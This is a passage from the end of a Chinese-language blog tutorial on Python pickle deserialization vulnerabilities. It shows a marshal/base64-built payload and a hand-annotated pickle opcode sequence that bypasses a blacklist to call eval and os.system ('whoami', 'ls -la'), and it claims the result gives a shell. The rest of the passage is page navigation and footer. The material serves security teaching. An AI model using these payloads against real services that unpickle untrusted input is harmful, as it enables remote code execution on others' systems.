class="string">&#x27;eval&#x27;</span>)(<span class="string">&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;success!!!&#x27;</span>)</span><br><span class="line"></span><br><span class="line">encoded = base64.b64encode(marshal.dumps(foo.__code__)).decode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;&quot;&quot;ctypes</span></span><br><span class="line"><span class="string">FunctionType</span></span><br><span class="line"><span class="string">(cmarshal</span></span><br><span class="line"><span class="string">loads</span></span><br><span class="line"><span class="string">(cbase64</span></span><br><span class="line"><span class="string">b64decode</span></span><br><span class="line"><span class="string">(S&#x27;<span class="subst">&#123;encoded&#125;</span>&#x27;</span></span><br><span class="line"><span class="string">tRtRcbuiltins</span></span><br><span class="line"><span class="string">globals</span></span><br><span class="line"><span class="string">(tRS&#x27;&#x27;</span></span><br><span class="line"><span class="string">tR(tR.&quot;&quot;&quot;</span>)</span><br><span class="line">利用该 opcode 执行即可 getshell</span><br></pre></td></tr></table></figure>

<ol>
<li>也可使用开源项目 <a target="_blank" rel="noopener" href="https://github.com/eddieivan01/pker%EF%BC%8Creadme%E4%B8%AD%E6%9C%89%E8%AF%A5%E6%83%85%E6%99%AF%E7%9A%84%E6%9E%84%E9%80%A0%E6%96%B9%E5%BC%8F">https://github.com/eddieivan01/pker，readme中有该情景的构造方式</a></li>
<li>尝试手搓</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">cbuiltins <span class="comment">#设置builtins为可执行对象</span></span><br><span class="line"><span class="built_in">getattr</span> <span class="comment">#获取builtins.getattr函数，而且被存放在stack中</span></span><br><span class="line">(cbuiltins <span class="comment">#getattr函数从stack中弹出，被圧入metastack；设置builtins为可执行对象</span></span><br><span class="line"><span class="built_in">dict</span> <span class="comment">#获取builtins.dict对象（因为globals是字典类型的），得到的dict类型被存放在stack中</span></span><br><span class="line">S<span class="string">&#x27;get&#x27;</span> <span class="comment">#将&quot;get&quot;字符串压入stack中</span></span><br><span class="line">tR(cbuiltins <span class="comment">###弹出metastack中的getattr函数，圧入stack中，然后使顶层的builtins.dict,&#x27;get&#x27;组成元组，</span></span><br><span class="line">   <span class="comment">###再将这整个结果圧入栈中（这时getattr函数和新组成的元组均被存放在stack中，而metastack为空）；</span></span><br><span class="line">   <span class="comment">###随后执行builtins.getattr(builtins.dict,&#x27;get&#x27;)，使得metastack为空，而stack中是结果，也就是对dict类型的get方法；</span></span><br><span class="line">   <span class="comment">###之后get方法从stack弹出并圧入metastack；最后设置builtins为可执行对象</span></span><br><span class="line"><span class="built_in">globals</span> <span class="comment">#获取builtins.globals，被存放在stack中（这时metastack为get方法而stack中是builtins.globals）</span></span><br><span class="line">(tRS<span class="string">&#x27;builtins&#x27;</span> <span class="comment">###将builtins.globals从stack中弹出并圧入metastack，这时metastack含有get方法和globals函数，而stack为空；</span></span><br><span class="line">   <span class="comment">###从metastack中弹出globals函数至stack，生成了一个空元组并被圧入stack；命令执行globals()，且将结果圧入stack；</span></span><br><span class="line">   <span class="comment">###随后&quot;builtins&quot;字符串被圧入stack栈中</span></span><br><span class="line">tRp1 <span class="comment">###从metastack中弹出get函数至stack中（这时metastack已经空了），原先在stack顶层的&quot;builtins&quot;字符串和globals()的结果组成一个新元组；</span></span><br><span class="line">   <span class="comment">###命令执行dict.get(globals(),&quot;builtins&quot;)，生成的结果圧入stack中；将stack顶部的内容存到memo的里，编号为1</span></span><br><span class="line">cbuiltins</span><br><span class="line"><span class="built_in">getattr</span></span><br><span class="line">(g1 <span class="comment">#获取builtins对象</span></span><br><span class="line">S<span class="string">&#x27;eval&#x27;</span></span><br><span class="line">tR(S<span class="string">&#x27;__import__(&quot;os&quot;).system(&quot;ls -la&quot;)&#x27;</span> <span class="comment">#等同于builtins.getattr(builtins,&quot;eval&quot;)并将这个可调用的eval对象压入栈中</span></span><br><span class="line">tR <span class="comment">#等同于eval(&quot;__import__(&#x27;os).system(&#x27;ls&#x27;)&quot;)并结束程序的运行</span></span><br><span class="line">. <span class="comment">#结束的标志</span></span><br></pre></td></tr></table></figure>

  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Article</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A6%82%E8%BF%B0"><span class="toc-number">1.</span> <span class="toc-text">概述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Pickle"><span class="toc-number">2.</span> <span class="toc-text">Pickle</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#OPcode-Operation-Code"><span class="toc-number">2.1.</span> <span class="toc-text">OPcode(Operation Code)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%89%B9%E6%80%A7"><span class="toc-number">2.2.</span> <span class="toc-text">特性</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Blacklist-%E7%BB%95%E8%BF%87"><span class="toc-number">3.</span> <span class="toc-text">Blacklist 绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%84%E9%80%A0-opcode"><span class="toc-number">3.1.</span> <span class="toc-text">构造 opcode</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&text=python反序列化漏洞"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&is_video=false&description=python反序列化漏洞"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=python反序列化漏洞&body=Check out this article: http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&name=python反序列化漏洞&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&t=python反序列化漏洞"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022-2024
    psych
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Article</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
  
    <!-- 不蒜子统计 -->
    <span id="busuanzi_container_site_pv">
            本站总访问量<span id="busuanzi_value_site_pv"></span>次
    </span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv" style='display:none'>
            本站访客数<span id="busuanzi_value_site_uv"></span>人
    </span>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

</footer>
    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'p5ych2022/psych.green';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
